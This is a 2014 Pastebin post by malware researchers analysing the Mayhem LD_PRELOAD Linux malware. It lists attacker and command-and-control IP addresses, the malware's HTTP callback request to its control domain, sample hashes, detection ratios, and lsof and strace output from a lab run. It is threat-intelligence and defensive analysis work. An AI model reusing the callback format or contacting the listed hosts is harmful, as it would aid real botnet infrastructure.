daily pastebin goal
87%
SHARE
TWEET

Mayhem installer Aug 5th 2014

MalwareMustDie Aug 5th, 2014 597 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMUSTDie! Mayhem (.so ELF malware abusing LD_PRELOAD) installer
  2. # Case spotted & captured by @yinX, analyzed : @unixfreaxjp
  3. # CNC: 176.119.3.242||58271 | 176.119.3.0/24 | AS | UA | ONLINE.ORG.UA | FOP GUBINA LUBOV PETRIVNA
  4. # Attacker Source;
  5. $ echo 46.149.111.171   |bash origin.sh
  6. 46.149.111.171||61214 | 46.149.111.0/24 | VDSINSIDE | UA | VDSINSIDE.COM | ELERIUM LTD
  7. $
  8. $ echo 188.165.217.216   |bash origin.sh
  9. 188.165.217.216|ns312431.ip-188-165-217.eu.|16276 | 188.165.0.0/16 | OVH | FR | OVH.COM | OVH SAS
  10. $
  11. $ echo 176.119.3.242   |bash origin.sh
  12. 176.119.3.242||58271 | 176.119.3.0/24 | AS | UA | ONLINE.ORG.UA | FOP GUBINA LUBOV PETRIVNA
  13.  
  14. # callback format:
  15.    POST /cupids_banner/cupids.php HTTP/1.0
  16.    Host: lovecupidonline.info
  17.    Pragma: 1337
  18.  
  19. #Detection ratio in Virus Total (noted, it is NOT Windows binary, detection ratio for these are VERY reliable actual figure)
  20.  
  21. PHP installer: (6/54) 03c80f6d678857431645e079eeacb21cbe4e37f1a4643814dd7ad67a926d8c2a
  22. ELF bruteforce.so: (2/54) 3ec6f7201d8578b2befb55652a2c9df25ed0e62ffd8e38f8d9bea23bebfdcf3c
  23. ELF cmsurls.so: (2/54) 3d07e0fb23d0e498b25bca7f4dd696cf507763242725e98b92178332a112bc36
  24. ELF atom-aggregator-32.so (16/54) 8983f3a07236bcf24f8db4c4c0cec1ad0042806cbf431500867da01c2f4619d4
  25. ELF atom-aggregator-64.so (14/54) 77d77eed0cad458fd1f3278d5bb93b8e7073d87f855c9e811cec66abad428b53
  26.  
  27. // dropped malware drive:
  28.  
  29. -rw-r--r-- 1 12582912 Aug  5 10:25 .cache 74fb94dcf856dbe4e848dbcedb51c419
  30. #fail in decrypting...
  31.  
  32. // samples:
  33.  
  34. MD5 (atom-aggregator-32.so) = 61092c67dd76505ed23434fdad14f26a (this binary analysis)
  35. MD5 (atom-aggregator-64.so) = af680d137d3fb407ef654a98e2ac7643 (this binary analysis)
  36. MD5 (bruteforce.so) = ab69765fadcec09e44cc0df06653982e ==> bruters, self explanatory
  37. MD5 (cmsurls.so) = 720bc891a7468ef5c29eb4da211c142b ==> callbacks: https://gist.github.com/Yinette/082d616453ca574c6a7b
  38.  
  39. // executed, PoC:
  40.  
  41. mmd@1x111 ~/0x02E/009 $ date
  42. Tue Aug  5 10:27:46 CEST 2014
  43.  
  44. $ lsof |grep atom
  45. host      18153              mmd  DEL       REG      9,2          30149145 /home/mmd/0x02E/009/atom-aggregator-64.so
  46.  
  47. $ lsof -p 18153
  48. COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF     NODE NAME
  49. host    18153  mmd  cwd    DIR    9,2     4096 30148960 /home/mmd/0x02E/009
  50. host    18153  mmd  rtd    DIR    9,2     4096        2 /
  51. host    18153  mmd  txt    REG    9,2   117128 12453326 /usr/bin/host
  52. host    18153  mmd  mem    REG    9,2    22928 38797877 /lib/x86_64-linux-gnu/libnss_dns-2.13.so
  53. host    18153  mmd  mem    REG    9,2    47616 38797878 /lib/x86_64-linux-gnu/libnss_files-2.13.so
  54. host    18153  mmd  mem    REG    9,2 12582912 30149146 /home/mmd/0x02E/009/.cache
  55. host    18153  mmd  mem    REG    9,2    93208 12455541 /usr/lib/x86_64-linux-gnu/openssl-1.0.0/engines/libgost.so
  56. host    18153  mmd  mem    REG    9,2   530736 38797873 /lib/x86_64-linux-gnu/libm-2.13.so
  57. host    18153  mmd  mem    REG    9,2   141784 38797700 /lib/x86_64-linux-gnu/liblzma.so.5.0.0
  58. host    18153  mmd  mem    REG    9,2    18672 38797775 /lib/x86_64-linux-gnu/libattr.so.1.1.0
  59. host    18153  mmd  mem    REG    9,2    34840 12456099 /usr/lib/libisccc.so.80.0.2
  60. host    18153  mmd  mem    REG    9,2    92752 38797727 /lib/x86_64-linux-gnu/libz.so.1.2.7
  61. host    18153  mmd  mem    REG    9,2    80712 38797886 /lib/x86_64-linux-gnu/libresolv-2.13.so
  62. host    18153  mmd  mem    REG    9,2    14320 38797702 /lib/x86_64-linux-gnu/libkeyutils.so.1.4
  63. host    18153  mmd  mem    REG    9,2    35400 12455796 /usr/lib/x86_64-linux-gnu/libkrb5support.so.0.1
  64. host    18153  mmd  mem    REG    9,2    14672 38797691 /lib/x86_64-linux-gnu/libcom_err.so.2.1
  65. host    18153  mmd  mem    REG    9,2   162632 12455436 /usr/lib/x86_64-linux-gnu/libk5crypto.so.3.1
  66. host    18153  mmd  mem    REG    9,2   868096 12455510 /usr/lib/x86_64-linux-gnu/libkrb5.so.3.3
  67. host    18153  mmd  mem    REG    9,2   219192 12451949 /usr/lib/libGeoIP.so.1.4.8
  68. host    18153  mmd  mem    REG    9,2  1599536 38797824 /lib/x86_64-linux-gnu/libc-2.13.so
  69. host    18153  mmd  mem    REG    9,2  1436984 12455509 /usr/lib/x86_64-linux-gnu/libxml2.so.2.8.0
  70. host    18153  mmd  mem    REG    9,2   131107 38797884 /lib/x86_64-linux-gnu/libpthread-2.13.so
  71. host    18153  mmd  mem    REG    9,2    17112 38797717 /lib/x86_64-linux-gnu/libcap.so.2.22
  72. host    18153  mmd  mem    REG    9,2    14768 38797839 /lib/x86_64-linux-gnu/libdl-2.13.so
  73. host    18153  mmd  mem    REG    9,2   368072 12453396 /usr/lib/libisc.so.84.1.0
  74. host    18153  mmd  mem    REG    9,2   139616 12452611 /usr/lib/libisccfg.so.82.0.3
  75. host    18153  mmd  mem    REG    9,2    51048 12452613 /usr/lib/libbind9.so.80.0.7
  76. host    18153  mmd  mem    REG    9,2  2048480 12455516 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
  77. host    18153  mmd  mem    REG    9,2   257288 12455485 /usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2.2
  78. host    18153  mmd  mem    REG    9,2  1674552 12452609 /usr/lib/libdns.so.88.1.1
  79. host    18153  mmd  mem    REG    9,2    75752 12455394 /usr/lib/liblwres.so.80.0.3
  80. host    18153  mmd  DEL    REG    9,2          30149145 /home/mmd/0x02E/009/atom-aggregator-64.so
  81. host    18153  mmd  mem    REG    9,2   136936 38797728 /lib/x86_64-linux-gnu/ld-2.13.so
  82. host    18153  mmd    0r   CHR    1,3      0t0     1027 /dev/null
  83. host    18153  mmd    1r   CHR    1,3      0t0     1027 /dev/null
  84. host    18153  mmd    2r   CHR    1,3      0t0     1027 /dev/null
  85. host    18153  mmd    3r   CHR    1,3      0t0     1027 /dev/null
  86.  
  87. // patch to debug:
  88.  
  89. execve("/usr/bin/host", ["/usr/bin/host"], [/* 20 vars */]) = 0
  90. brk(0)                                  = 0x7f57dd0d4000
  91. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  92. mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0bf000
  93. open("./atom-aggregator-64.so", O_RDONLY) = 3
  94. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0x\23\0\0\0\0\0\0"..., 832) = 832
  95. fstat(3, {st_mode=S_IFREG|0644, st_size=27272, ...}) = 0
  96. getcwd("/home/mmd/0x02E/009", 128)      = 20
  97. mmap(NULL, 2151928, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57dac94000
  98. mprotect(0x7f57dac9b000, 2093056, PROT_NONE) = 0
  99. mmap(0x7f57dae9a000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x6000) = 0x7f57dae9a000
  100. mmap(0x7f57dae9b000, 26104, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57dae9b000
  101. mprotect(0x7fff5d64a000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|PROT_GROWSDOWN) = 0
  102. close(3)                                = 0
  103. access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
  104. open("/etc/ld.so.cache", O_RDONLY)      = 3
  105. fstat(3, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
  106. mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f57db0b1000
  107. close(3)                                = 0
  108. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  109. open("/usr/lib/liblwres.so.80", O_RDONLY) = 3
  110. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P6\0\0\0\0\0\0"..., 832) = 832
  111. fstat(3, {st_mode=S_IFREG|0644, st_size=75752, ...}) = 0
  112. mmap(NULL, 2171040, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57daa81000
  113. mprotect(0x7f57daa93000, 2093056, PROT_NONE) = 0
  114. mmap(0x7f57dac92000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x11000) = 0x7f57dac92000
  115. close(3)                                = 0
  116. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  117. open("/usr/lib/libdns.so.88", O_RDONLY) = 3
  118. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\220\244\2\0\0\0\0\0"..., 832) = 832
  119. fstat(3, {st_mode=S_IFREG|0644, st_size=1674552, ...}) = 0
  120. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0b0000
  121. mmap(NULL, 3773136, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57da6e7000
  122. mprotect(0x7f57da879000, 2093056, PROT_NONE) = 0
  123. mmap(0x7f57daa78000, 32768, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x191000) = 0x7f57daa78000
  124. mmap(0x7f57daa80000, 720, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57daa80000
  125. close(3)                                = 0
  126. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  127. open("/usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2", O_RDONLY) = 3
  128. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\266\0\0\0\0\0\0"..., 832) = 832
  129. fstat(3, {st_mode=S_IFREG|0644, st_size=257288, ...}) = 0
  130. mmap(NULL, 2353120, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57da4a8000
  131. mprotect(0x7f57da4e4000, 2097152, PROT_NONE) = 0
  132. mmap(0x7f57da6e4000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3c000) = 0x7f57da6e4000
  133. close(3)                                = 0
  134. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  135. open("/usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0", O_RDONLY) = 3
  136. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\207\7\0\0\0\0\0"..., 832) = 832
  137. fstat(3, {st_mode=S_IFREG|0644, st_size=2048480, ...}) = 0
  138. mmap(NULL, 4158808, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57da0b0000
  139. mprotect(0x7f57da27a000, 2097152, PROT_NONE) = 0
  140. mmap(0x7f57da47a000, 172032, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ca000) = 0x7f57da47a000
  141. mmap(0x7f57da4a4000, 13656, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57da4a4000
  142. close(3)                                = 0
  143. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  144. open("/usr/lib/libbind9.so.80", O_RDONLY) = 3
  145. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340-\0\0\0\0\0\0"..., 832) = 832
  146. fstat(3, {st_mode=S_IFREG|0644, st_size=51048, ...}) = 0
  147. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0af000
  148. mmap(NULL, 2146352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9ea3000
  149. mprotect(0x7f57d9eaf000, 2093056, PROT_NONE) = 0
  150. mmap(0x7f57da0ae000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0xb000) = 0x7f57da0ae000
  151. close(3)                                = 0
  152. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  153. open("/usr/lib/libisccfg.so.82", O_RDONLY) = 3
  154. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\355\0\0\0\0\0\0"..., 832) = 832
  155. fstat(3, {st_mode=S_IFREG|0644, st_size=139616, ...}) = 0
  156. mmap(NULL, 2238208, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9c80000
  157. mprotect(0x7f57d9c9b000, 2097152, PROT_NONE) = 0
  158. mmap(0x7f57d9e9b000, 28672, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b000) = 0x7f57d9e9b000
  159. mmap(0x7f57d9ea2000, 1792, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d9ea2000
  160. close(3)                                = 0
  161. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  162. open("/usr/lib/libisc.so.84", O_RDONLY) = 3
  163. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360\374\0\0\0\0\0\0"..., 832) = 832
  164. fstat(3, {st_mode=S_IFREG|0644, st_size=368072, ...}) = 0
  165. mmap(NULL, 2464112, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9a26000
  166. mprotect(0x7f57d9a7e000, 2093056, PROT_NONE) = 0
  167. mmap(0x7f57d9c7d000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x57000) = 0x7f57d9c7d000
  168. close(3)                                = 0
  169. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  170. open("/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY) = 3
  171. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340\r\0\0\0\0\0\0"..., 832) = 832
  172. fstat(3, {st_mode=S_IFREG|0644, st_size=14768, ...}) = 0
  173. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ae000
  174. mmap(NULL, 2109696, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9822000
  175. mprotect(0x7f57d9824000, 2097152, PROT_NONE) = 0
  176. mmap(0x7f57d9a24000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f57d9a24000
  177. close(3)                                = 0
  178. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  179. open("/lib/x86_64-linux-gnu/libcap.so.2", O_RDONLY) = 3
  180. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\220\26\0\0\0\0\0\0"..., 832) = 832
  181. fstat(3, {st_mode=S_IFREG|0644, st_size=17112, ...}) = 0
  182. mmap(NULL, 2112384, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d961e000
  183. mprotect(0x7f57d9622000, 2093056, PROT_NONE) = 0
  184. mmap(0x7f57d9821000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7f57d9821000
  185. close(3)                                = 0
  186. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  187. open("/lib/x86_64-linux-gnu/libpthread.so.0", O_RDONLY) = 3
  188. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0@\\\0\0\0\0\0\0"..., 832) = 832
  189. fstat(3, {st_mode=S_IFREG|0755, st_size=131107, ...}) = 0
  190. mmap(NULL, 2208672, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d9402000
  191. mprotect(0x7f57d9419000, 2093056, PROT_NONE) = 0
  192. mmap(0x7f57d9618000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x16000) = 0x7f57d9618000
  193. mmap(0x7f57d961a000, 13216, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d961a000
  194. close(3)                                = 0
  195. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  196. open("/usr/lib/x86_64-linux-gnu/libxml2.so.2", O_RDONLY) = 3
  197. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0`\377\2\0\0\0\0\0"..., 832) = 832
  198. fstat(3, {st_mode=S_IFREG|0644, st_size=1436984, ...}) = 0
  199. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ad000
  200. mmap(NULL, 3537400, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d90a2000
  201. mprotect(0x7f57d91f7000, 2097152, PROT_NONE) = 0
  202. mmap(0x7f57d93f7000, 40960, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x155000) = 0x7f57d93f7000
  203. mmap(0x7f57d9401000, 2552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d9401000
  204. close(3)                                = 0
  205. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  206. open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 3
  207. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
  208. fstat(3, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
  209. mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d8d17000
  210. mprotect(0x7f57d8e99000, 2093056, PROT_NONE) = 0
  211. mmap(0x7f57d9098000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x181000) = 0x7f57d9098000
  212. mmap(0x7f57d909d000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d909d000
  213. close(3)                                = 0
  214. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  215. open("/usr/lib/libGeoIP.so.1", O_RDONLY) = 3
  216. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0c\0\0\0\0\0\0"..., 832) = 832
  217. fstat(3, {st_mode=S_IFREG|0644, st_size=219192, ...}) = 0
  218. mmap(NULL, 2314592, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d8ae1000
  219. mprotect(0x7f57d8b15000, 2093056, PROT_NONE) = 0
  220. mmap(0x7f57d8d14000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x33000) = 0x7f57d8d14000
  221. close(3)                                = 0
  222. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  223. open("/usr/lib/x86_64-linux-gnu/libkrb5.so.3", O_RDONLY) = 3
  224. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\20\310\1\0\0\0\0\0"..., 832) = 832
  225. fstat(3, {st_mode=S_IFREG|0644, st_size=868096, ...}) = 0
  226. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ac000
  227. mmap(NULL, 2963968, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d880d000
  228. mprotect(0x7f57d88d6000, 2093056, PROT_NONE) = 0
  229. mmap(0x7f57d8ad5000, 49152, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0xc8000) = 0x7f57d8ad5000
  230. close(3)                                = 0
  231. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  232. open("/usr/lib/x86_64-linux-gnu/libk5crypto.so.3", O_RDONLY) = 3
  233. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\360H\0\0\0\0\0\0"..., 832) = 832
  234. fstat(3, {st_mode=S_IFREG|0644, st_size=162632, ...}) = 0
  235. mmap(NULL, 2261424, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d85e4000
  236. mprotect(0x7f57d860a000, 2097152, PROT_NONE) = 0
  237. mmap(0x7f57d880a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7f57d880a000
  238. mmap(0x7f57d880c000, 432, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d880c000
  239. close(3)                                = 0
  240. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  241. open("/lib/x86_64-linux-gnu/libcom_err.so.2", O_RDONLY) = 3
  242. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320\26\0\0\0\0\0\0"..., 832) = 832
  243. fstat(3, {st_mode=S_IFREG|0644, st_size=14672, ...}) = 0
  244. mmap(NULL, 2109928, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d83e0000
  245. mprotect(0x7f57d83e3000, 2093056, PROT_NONE) = 0
  246. mmap(0x7f57d85e2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f57d85e2000
  247. close(3)                                = 0
  248. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  249. open("/usr/lib/x86_64-linux-gnu/libkrb5support.so.0", O_RDONLY) = 3
  250. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240%\0\0\0\0\0\0"..., 832) = 832
  251. fstat(3, {st_mode=S_IFREG|0644, st_size=35400, ...}) = 0
  252. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0ab000
  253. mmap(NULL, 2130800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d81d7000
  254. mprotect(0x7f57d81df000, 2093056, PROT_NONE) = 0
  255. mmap(0x7f57d83de000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x7000) = 0x7f57d83de000
  256. close(3)                                = 0
  257. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  258. open("/lib/x86_64-linux-gnu/libkeyutils.so.1", O_RDONLY) = 3
  259. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\22\0\0\0\0\0\0"..., 832) = 832
  260. fstat(3, {st_mode=S_IFREG|0644, st_size=14320, ...}) = 0
  261. mmap(NULL, 2109456, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7fd3000
  262. mprotect(0x7f57d7fd6000, 2093056, PROT_NONE) = 0
  263. mmap(0x7f57d81d5000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f57d81d5000
  264. close(3)                                = 0
  265. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  266. open("/lib/x86_64-linux-gnu/libresolv.so.2", O_RDONLY) = 3
  267. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\3008\0\0\0\0\0\0"..., 832) = 832
  268. fstat(3, {st_mode=S_IFREG|0644, st_size=80712, ...}) = 0
  269. mmap(NULL, 2185864, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7dbd000
  270. mprotect(0x7f57d7dd0000, 2093056, PROT_NONE) = 0
  271. mmap(0x7f57d7fcf000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x12000) = 0x7f57d7fcf000
  272. mmap(0x7f57d7fd1000, 6792, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f57d7fd1000
  273. close(3)                                = 0
  274. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  275. open("/lib/x86_64-linux-gnu/libz.so.1", O_RDONLY) = 3
  276. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\340#\0\0\0\0\0\0"..., 832) = 832
  277. fstat(3, {st_mode=S_IFREG|0644, st_size=92752, ...}) = 0
  278. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0aa000
  279. mmap(NULL, 2187792, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7ba6000
  280. mprotect(0x7f57d7bbc000, 2093056, PROT_NONE) = 0
  281. mmap(0x7f57d7dbb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15000) = 0x7f57d7dbb000
  282. close(3)                                = 0
  283. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  284. open("/usr/lib/libisccc.so.80", O_RDONLY) = 3
  285. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320'\0\0\0\0\0\0"..., 832) = 832
  286. fstat(3, {st_mode=S_IFREG|0644, st_size=34840, ...}) = 0
  287. mmap(NULL, 2130208, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d799d000
  288. mprotect(0x7f57d79a5000, 2093056, PROT_NONE) = 0
  289. mmap(0x7f57d7ba4000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x7000) = 0x7f57d7ba4000
  290. close(3)                                = 0
  291. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  292. open("/lib/x86_64-linux-gnu/libattr.so.1", O_RDONLY) = 3
  293. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0000\25\0\0\0\0\0\0"..., 832) = 832
  294. fstat(3, {st_mode=S_IFREG|0644, st_size=18672, ...}) = 0
  295. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0a9000
  296. mmap(NULL, 2113880, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f57d7798000
  297. mprotect(0x7f57d779c000, 2093056, PROT_NONE) = 0
  298. mmap(0x7f57d799b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3000) = 0x7f57d799b000
  299. close(3)                                = 0
  300. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  301. open("/lib/x86_64-linux-gnu/liblzma.so.5", O_RDONLY) = 3
